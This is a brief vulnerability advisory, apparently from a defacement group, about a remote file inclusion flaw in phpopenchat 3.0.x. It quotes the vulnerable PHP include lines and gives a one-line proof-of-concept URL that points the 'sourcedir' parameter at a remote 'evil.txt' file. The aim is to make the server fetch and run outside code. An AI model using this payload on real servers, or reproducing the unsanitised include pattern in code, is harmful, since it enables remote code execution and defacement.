|
[W]orld [D]efacers Team=0D
--------------------Summary----------------=0D
=0D
eVuln ID: WD23=0D
=0D
Vendor: phpopenchat-3.0.*=0D
=0D
Vendor's Web Site: http://phpopenchat.org=0D
=0D
Class: Remote=0D
=0D
PoC/Exploit: Available=0D
=0D
Solution: Not Available=0D
=0D
Discovered by: rUnViRuS ( wdzone.net & worlddefacers.de )=0D
=0D
-----------------Description---------------=0D
=0D
include_once("QueryString.php");=0D
include_once("Settings.php");=0D
include_once("$sourcedir/Subs.php");=0D
include_once("$sourcedir/Errors.php");=0D
include_once("$sourcedir/Load.php");=0D
//include_once("$sourcedir/Security.php");=0D
=0D
--------------PoC/Exploit----------------------=0D
=0D
http://www.host.com/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://host/evil.txt?=0D
=0D
--------------Solution---------------------=0D
=0D
No Patch available.=0D
=0D
--------------Credit-----------------------=0D
=0D
Discovered by: rUnViRuS (worlddefacers.de)=0D
=0D
=0D